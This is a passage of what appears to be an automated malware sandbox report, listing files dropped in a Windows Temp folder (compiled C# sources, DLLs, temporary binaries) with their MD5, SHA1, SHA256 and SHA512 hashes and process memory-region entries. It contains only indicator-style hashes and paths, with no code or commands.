| SHA1 | fde6d5c4e61dff27f46f69c480155e1101397700 |
| SHA256 | 552cfb233eff0461a558e7e25cea4e6b720ce96953fa1ee5d231c4ae67fdf102 |
| SHA512 | 3e2cfa712aba0bc2ba463e9543e6270f49134533b10aa4b851d5e4aec97c2daec663f484b412715fb3df6496617c97974812fef5edf569a9784377859b3c56b5 |
\??\c:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.0.cs
| MD5 | 9a10482acb9e6952b96f4efc24d9d783 |
| SHA1 | 5cfc9bf668351df25fcda98c3c2d0bb056c026c3 |
| SHA256 | a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377 |
| SHA512 | e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28 |
memory/2720-146-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\ah5igeoc\CSC24D500C657934025B3BFB861A4C63B85.TMP
| MD5 | e250c595c30addb02ffc6984e63a7380 |
| SHA1 | b44e41b7d62b61f9b04eed3e311910f34a0ebedb |
| SHA256 | 15f35b53c4861185a583a1dbcb3222d7ac9654681b0dbc2fe031d59757baa063 |
| SHA512 | 8abf7fe5b21c2a61c01c7eefcc996d2e7068d245aba9071c7db224abbd32b16610efafca56171728d2da0ebcbeb98116847bdaa8071c2111e8686700f96abfd6 |
C:\Users\Admin\AppData\Local\Temp\RES1F40.tmp
| MD5 | a9eead4a76288738990c8668032dd780 |
| SHA1 | ece0771b0b40abec808cd5e8dedfbebbd4345d68 |
| SHA256 | 925c00351b791b62cd80c6d7dab5f276374ae454146317405984eabd303746dc |
| SHA512 | b2ccc1ee6d4eb958098ea279c27093836ccc6a7e2148602fcb5ee2dbc457c169f30179047ab206a85ba66cf696edb6005f0819558a00e372c36458d37b5fa4bb |
C:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.dll
| MD5 | 8495c9cbe1593820014899a043577e1b |
| SHA1 | b395a19a3262dc61ea9f3174cad05e194fcbbe57 |
| SHA256 | 08496276bf461cb5696ddbde59bf09077bf8809e27c9e4b4e74d8d59409996c8 |
| SHA512 | 035d7f718a2d50e578b2c1464ddd1fb91a7ef4b656ff9bbd2af4adcdf44b839ce7c759c524ba02fffab3b09aef704a36eba7a0429e3836c7a5c3f0c207bc9715 |
memory/696-150-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.cmdline
| MD5 | 340f65806e42a1b022861685812d236b |
| SHA1 | a53ffde123a1837fe255d764e7a992ab905fb8b9 |
| SHA256 | b75d827e0d31904c9782c6ed7f767265477310971a1f4335efc140f0f074ceb7 |
| SHA512 | 30b0f1d6ca38cf067b85fb51556b52f2dd743055ea08b8e72d2ad654aff178093d13ca0c19b4b6a1c728978df90b2e7b9941ca2b3bf75694c7220d40b28579bb |
\??\c:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.0.cs
| MD5 | aca9704199c51fde14b8bf8165bc2a4c |
| SHA1 | 789b408ccad29240bd093515cbd19a199ad2c1c8 |
| SHA256 | cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27 |
| SHA512 | a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6 |
memory/1932-153-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\jfroacpp\CSC9430E91D549343849319CE1EE7C3E4DD.TMP
| MD5 | 83ab673e353bc97b876da6cfc8b171d8 |
| SHA1 | 4a661313af68b943f2580cdbcf76b19a89e12734 |
| SHA256 | 2a0cbd619f15e2cc9a716556eed90f2e8f130999317d327fa1d96744309e450e |
| SHA512 | a17c1dfffaa789762e8ec8146d1d0c1136f5a706d2c3387965cbb4bf58b35cb7db764164d263ce371cbc4dd39d3a4fad8b18928caaf73307c696e74bfd722f93 |
C:\Users\Admin\AppData\Local\Temp\RES1FDC.tmp
| MD5 | 860be3be01f3f3c1bb8223c4b4ebf8d5 |
| SHA1 | 98662fcdbf155d942f6aec76e367f0fef5cb1f21 |
| SHA256 | 51f4a4c2de2bb96c36d8e1fc4226bf530d8c3d90347ce8c4244964c1b835ba54 |
| SHA512 | 63f3f394d791aae4dd154109e21dc6d6b21cad707296fbc7ac1c6179febdf17d6313d9b2ef85a8be66aea79f47e983a08af2c551eb4c94a765393a7ce450ba8b |
C:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.dll
| MD5 | ea0f2464b104a78625ed3074b10d5b26 |
| SHA1 | 871ebae4ea06340b952d4671f6cf79013808bf22 |
| SHA256 | 4823aab825570b456b0ded382a952b148c6fd24127143f214d93e8a9fe8c8506 |
| SHA512 | 82fdfcef702db4bec115d91411e67512a332a7113150fabfcae74f71e9e7090a489f6ebfccaa5e3b28c3c934ce089973e3d07338a47f6d67f2f72f0b998b2f10 |
memory/3932-157-0x00007FFBF9490000-0x00007FFBF9F51000-memory.dmp
memory/3932-158-0x000001CF6F4E0000-0x000001CF6F51D000-memory.dmp
memory/3448-159-0x000001E7C59B0000-0x000001E7C5A53000-memory.dmp
memory/3020-160-0x0000000007E40000-0x0000000007EE3000-memory.dmp
memory/2616-162-0x0000000000000000-mapping.dmp
memory/1860-161-0x0000000000000000-mapping.dmp
memory/3656-163-0x0000000000000000-mapping.dmp
memory/1344-164-0x0000000000000000-mapping.dmp
memory/3720-165-0x0000019D12F00000-0x0000019D12FA3000-memory.dmp
memory/2616-166-0x00000000005A6B20-0x00000000005A6B24-memory.dmp
memory/4104-167-0x00000204A5A10000-0x00000204A5AB3000-memory.dmp
memory/536-168-0x00000223FA1E0000-0x00000223FA283000-memory.dmp
memory/3020-169-0x000000000B160000-0x000000000B29B000-memory.dmp
memory/2616-170-0x0000000000A70000-0x0000000000B06000-memory.dmp
memory/5028-174-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | f7aea2435aa888b709ca20f816c33bfd |
| SHA1 | 38717c9a73b5f8bd399839cbe0aa57518427e758 |
| SHA256 | f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5 |
| SHA512 | 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232 |
memory/2876-176-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/4020-178-0x0000000000000000-mapping.dmp
memory/3020-179-0x00000000084A0000-0x00000000085DA000-memory.dmp
memory/3936-183-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | 42bfa4737502d07aa54f4c8ee04c5fef |
| SHA1 | 7198ae79a9c046de5d684acfd132b37f00f6a425 |
| SHA256 | 3ab1b367877d3869cf3c6996a677d215ada1f76719a788bd23f622dd311d3d36 |
| SHA512 | 5f8500e06373e66eb5fa954aafb5cbad214994442d67e8d2f21032f350b2d8e6fe7a79083322fb8383deece1678c32cde030e226e12346cd604366351ad74c1d |
memory/4668-185-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | 42bfa4737502d07aa54f4c8ee04c5fef |
| SHA1 | 7198ae79a9c046de5d684acfd132b37f00f6a425 |
| SHA256 | 3ab1b367877d3869cf3c6996a677d215ada1f76719a788bd23f622dd311d3d36 |
| SHA512 | 5f8500e06373e66eb5fa954aafb5cbad214994442d67e8d2f21032f350b2d8e6fe7a79083322fb8383deece1678c32cde030e226e12346cd604366351ad74c1d |
memory/1160-187-0x0000000000000000-mapping.dmp
memory/3020-188-0x0000000007E40000-0x0000000007EE3000-memory.dmp
memory/4240-189-0x0000000000000000-mapping.dmp
memory/4452-190-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | f2ea599a2b3969ca84eef5bfcb3872f5 |
| SHA1 | ea8db863a41c24696622269c1e9a59470d81d5ae |
| SHA256 | f4afef97443809ed08b7b279fb70ddef9e3e2ae96dbf0f0f8878d342c53ee765 |
| SHA512 | 6d18d72d27153253d36c2943d01ec09fded565afb6d6094c4a7062132ad60c4ad58ccbfc035644784ed338d543325f2e3062138cafebd4e4b6281f346a03d183 |
memory/4388-192-0x0000000000000000-mapping.dmp
memory/4448-193-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | 550324b3d2c3fccbf11991e605fb633a |
| SHA1 | 0e72da4bfa6e52f9b5627a825038f85135dc341a |
| SHA256 | bc7180b72043de2e008063fcc5f952b964d9c9530ad2aab4752aec84095df3a1 |
| SHA512 | 49883798521b722a2f40217ae8c96d960c6ccf31854d4b9008ce86700a67667e0168a798e1fb933e118fde9de890f40fc9ede8617356b7bd58b8ab1a46cc0f20 |
memory/2232-195-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | 550324b3d2c3fccbf11991e605fb633a |
| SHA1 | 0e72da4bfa6e52f9b5627a825038f85135dc341a |
| SHA256 | bc7180b72043de2e008063fcc5f952b964d9c9530ad2aab4752aec84095df3a1 |
| SHA512 | 49883798521b722a2f40217ae8c96d960c6ccf31854d4b9008ce86700a67667e0168a798e1fb933e118fde9de890f40fc9ede8617356b7bd58b8ab1a46cc0f20 |
memory/3144-197-0x0000000000000000-mapping.dmp
memory/2728-198-0x0000000000000000-mapping.dmp
memory/3576-199-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | 94b550334ec2b1b98472ead5fce8f180 |
| SHA1 | d2f658d2e49fcdc6c43b91e1dc712922f6412945 |
| SHA256 | 95a7fe2794be40bd2ac401f1b64b163db7c497887cc7833c59191e69cb8a4ca1 |
| SHA512 | 004cfcdf654e8160192b9181586c0ed1493c8638b77cf718f3e5419054b95db288412d98abdbfde6720e283548ad1ab3a172ad3ea33cb9f796c212e928c1d979 |
memory/3936-201-0x0000000000000000-mapping.dmp
memory/4472-202-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | de21ae01f00b8ae78b2d39e2055d1dc0 |
| SHA1 | 397a864a9dc4f574820996dc4d32a37659d0b531 |
| SHA256 | d369bd389a25236dfcc4910b99a40c0aab815e3544745230dcabef3beab75937 |
| SHA512 | d03ae00a7b999682ebfe93858349b01fc95b22910e48958d71aa019ea6d1aa7deb9bd0042c59e2ad07a4d1a454d6969cf86d53be557b93a3871d8c7437a61816 |
memory/3484-204-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | de21ae01f00b8ae78b2d39e2055d1dc0 |
| SHA1 | 397a864a9dc4f574820996dc4d32a37659d0b531 |
| SHA256 | d369bd389a25236dfcc4910b99a40c0aab815e3544745230dcabef3beab75937 |
| SHA512 | d03ae00a7b999682ebfe93858349b01fc95b22910e48958d71aa019ea6d1aa7deb9bd0042c59e2ad07a4d1a454d6969cf86d53be557b93a3871d8c7437a61816 |
memory/4616-206-0x0000000000000000-mapping.dmp
memory/2256-207-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | 397eb325e338a7924c540b5bcd94e374 |
| SHA1 | f88da33ae78e5fd848531e462da24a9a7c57de88 |
| SHA256 | 6cbecfa984f5200f16101f26d5e2c21290cfecc9a4621f880cff2e2392b3870c |
| SHA512 | f20765df381088b9e293dac8736d1475f90c6a732e7e148afadf69aa862f3f7c414a2a0b02d58555b43fe71cc4d28f737648ea97d0ee18395d472ffd4ab30a1e |
memory/3516-209-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | 397eb325e338a7924c540b5bcd94e374 |
| SHA1 | f88da33ae78e5fd848531e462da24a9a7c57de88 |
| SHA256 | 6cbecfa984f5200f16101f26d5e2c21290cfecc9a4621f880cff2e2392b3870c |
| SHA512 | f20765df381088b9e293dac8736d1475f90c6a732e7e148afadf69aa862f3f7c414a2a0b02d58555b43fe71cc4d28f737648ea97d0ee18395d472ffd4ab30a1e |
memory/1152-211-0x0000000000000000-mapping.dmp
memory/4456-212-0x0000000000000000-mapping.dmp
memory/2400-213-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | f1a2aa1f4f0c2e950ca2e946f24e52a7 |
| SHA1 | 5a6aa89b4cd8a10c7e968b3d357e8b438c7533d0 |
| SHA256 | 1fc846218d715bb746962b8978905a7b9f8c559c56ca1ca0d558dfba721d67ed |
| SHA512 | 54a2825defb8e69afdb4f23cacb80b3ac881a981566dee1eba4d6c916927ef7e74f83ac71959f829da710c540858f183beeef162dcb95ad992249b4732de810f |
memory/1976-215-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | f1a2aa1f4f0c2e950ca2e946f24e52a7 |
| SHA1 | 5a6aa89b4cd8a10c7e968b3d357e8b438c7533d0 |
| SHA256 | 1fc846218d715bb746962b8978905a7b9f8c559c56ca1ca0d558dfba721d67ed |
| SHA512 | 54a2825defb8e69afdb4f23cacb80b3ac881a981566dee1eba4d6c916927ef7e74f83ac71959f829da710c540858f183beeef162dcb95ad992249b4732de810f |
memory/2588-217-0x0000000000000000-mapping.dmp
memory/4276-218-0x0000000000000000-mapping.dmp
memory/4912-219-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | 9bae8ae2e7f60de0d8c3f9809a365b5a |
| SHA1 | c05309024e67723dbc40583390d9deb970208a30 |
| SHA256 | 9ef11a026250169cb0eca6369809bee07b0f24c5c1933938c25f4f84eb5d0abb |
| SHA512 | 0a55a13b234f55851cfe4b49d8cbf24c50db3805aeb00a3ca8004824c045fb0a3619e8a038b849f953672e2092a3e43bc945e7902458fb0b580f41cdaeddfc0a |
memory/5012-221-0x0000000000000000-mapping.dmp
memory/844-222-0x0000000000000000-mapping.dmp
memory/920-223-0x0000000000000000-mapping.dmp
memory/4036-225-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | 24e087934651d6f0a5885fa46f185864 |
| SHA1 | b20946bd3d31fcd75bc758c8e659de9dafaf20eb |
| SHA256 | b1626a5b8040ba8fbc5f15bdbde39f8e25177873df1fd2865db6949bc263af02 |
| SHA512 | f98260eb89115d6f26e03a6d866bd6bebcfb6a02dd69814f9a15e617670527556f8e7fdbc9f72ab323585169b28783a95982b929722294812ef0e4fa91ded06e |
memory/1092-226-0x0000000000000000-mapping.dmp
memory/2528-227-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | eb94ae3ce4b86bff9cafe1503fbc001d |
| SHA1 | 0bc3aee0a38c82f1e6775b1428219e7460e38ace |
| SHA256 | b037abcec90bc47921db5c251215e9cb135511d0b08ce395fd697b88d1e99f6b |
| SHA512 | 922243683bad6ef9ccb80fff75c8ff44673acd5c8f52e693c66e3e35589a12bd5ee24d875dea2759d6912a2159aa1d7086e765dd488bfef11eb531c9fe863aa2 |
memory/4892-229-0x0000000000000000-mapping.dmp
memory/5088-230-0x0000000000000000-mapping.dmp
memory/1980-231-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | a345edcdee52303ac713c76b2366a94c |
| SHA1 | 4452c95702106a78f24f701612788561e04c6407 |
| SHA256 | 4de5d19e13c2eab729c6a8ec04deeda952c11bb9651560a75248f46da86f9f2d |
| SHA512 | 3286dbb2a3619004b3ed58442cef3bb89db0ab2ab98627674e37db503de1b7c8f2147c99e44ebb8b98a7f6f13ef13b6dd501993b7a0dd0d579e01023b971695a |
C:\Users\Admin\AppData\Local\Temp\6602.bin
| MD5 | a345edcdee52303ac713c76b2366a94c |
| SHA1 | 4452c95702106a78f24f701612788561e04c6407 |
| SHA256 | 4de5d19e13c2eab729c6a8ec04deeda952c11bb9651560a75248f46da86f9f2d |
| SHA512 | 3286dbb2a3619004b3ed58442cef3bb89db0ab2ab98627674e37db503de1b7c8f2147c99e44ebb8b98a7f6f13ef13b6dd501993b7a0dd0d579e01023b971695a |